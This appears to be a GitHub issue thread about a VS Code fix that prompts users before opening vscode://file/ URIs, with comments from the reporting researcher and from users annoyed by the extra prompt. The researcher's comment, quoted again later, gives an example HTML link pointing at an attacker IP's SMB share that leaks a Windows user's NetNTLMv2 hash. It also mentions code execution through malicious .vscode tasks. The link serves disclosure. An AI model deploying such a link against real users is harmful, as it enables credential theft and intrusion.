Prompt users when opening vscode://file/... URIs

[Tyriar]

In order to eliminate security concerns on Windows, VS Code will now ask the user for permission before opening a URI of the form vscode://file/<path>.

Credits go to Abdel Adim 'smaury' Oisfi of https://www.shielder.it.

[DanTup]

VS Code will not ask

I guess this is a typo, and should say "now"?

[softlion]

What is the security concern ? Opening a file using vscode can lead to code execution ?

[smaury]

@softlion
Windows can open files hosted on SMB shares.
By default if a SMB share link is opened Windows sends the NetNTLMv2 of the logged-in user, which is basically your DOMAIN\username:hash_of_password. [1]
If you send those information to an attacker-controlled SMB share she could crack your password.
Moreover, hosting on the SMB share a custom task in the .vscode directory could allow the attacker to execute arbitrary code on the victim's client while running that task.

Considering the fact that vscode URIs can be opened through a browser (<a href="vscode://file/\<attacker-ip>\<share>\<path>">click me!</a>) it's a good idea to prompt the user what's happening before sharing her hashes 😉

[1] https://github.com/SpiderLabs/Responder

[mahen23]

This is what happens when you hire a bunch of SJW to write your code.

[cristi8]

@softlion
Windows can open files hosted on SMB shares.
By default if a SMB share link is opened Windows sends the NetNTLMv2 of the logged-in user, which is basically your DOMAIN\username:hash_of_password. [1]
If you send those information to an attacker-controlled SMB share she could crack your password.
Moreover, hosting on the SMB share a custom task in the .vscode directory could allow the attacker to execute arbitrary code on the victim's client while running that task.

Considering the fact that vscode URIs can be opened through a browser (<a href="vscode://file/\<attacker-ip>\<share>\<path>">click me!</a>) it's a good idea to prompt the user what's happening before sharing her hashes

[1] https://github.com/SpiderLabs/Responder

Wait, so opening an untrusted directory in vscode can lead to arbitrary code execution on my machine? (by having a malicious .vscode directory)

[smaury]

Wait, so opening an untrusted directory in vscode can lead to arbitrary code execution on my machine? (by having a malicious .vscode directory)

Yes, but requires user interaction:

1. You must open the untrusted project
2. You must run a task

This is possible because VS Code allows to specify a shell command as task [1], but in my opinion is more likely a feature than a security issue, that's why I didn't even report it 🤷🏾‍♂️

@Tyriar can probably argue more on the design choice.

[1] https://code.visualstudio.com/docs/editor/tasks

[DifficultNick]

How about giving the option to disable this prompt through settings?
When this action is frequent the extra click on "Yes" becomes annoying :(

[Tyriar]

@Tyriar can probably argue more on the design choice.

I didn't actually make this fix, I was just one of the endgame masters for the month. Follow #95670 for an answer on the UX side, normally we opt for the safer side though.

[jtbrower]

I have a situation where this is forcing me to answer the question twice. I have an internal tool that generates an HTML page shown in Chrome with links similar to the one below. The link points to the line number, column and file that is opened when I click on the link to the code from HTML page that I display through Chrome. Back when I built the tool, I spent a quite a while trying to stop Chrome from prompting me each time I open the file but just learned to live with it. Now that this has been added to VSCode, anytime I try to open an html link from Chrome to VSCode I am prompted once by Chrome and then a second time by VSCode. I wish both programs had an option to allow bypass without confirmation but it now appears that links like <a href='vscode://file/D:\OSPOS5\Shared\Build\Settings.Build.props:13:5'>.\Shared\Build\Settings.Build.props</a> are of little value now. I appreciate the security concerns but we are all advanced developers who should be able to bypass impractical annoyances like this. Can we please have a setting for this?

[Tyriar]

@jtbrower please comment on #95670 regarding UX problems with this fix.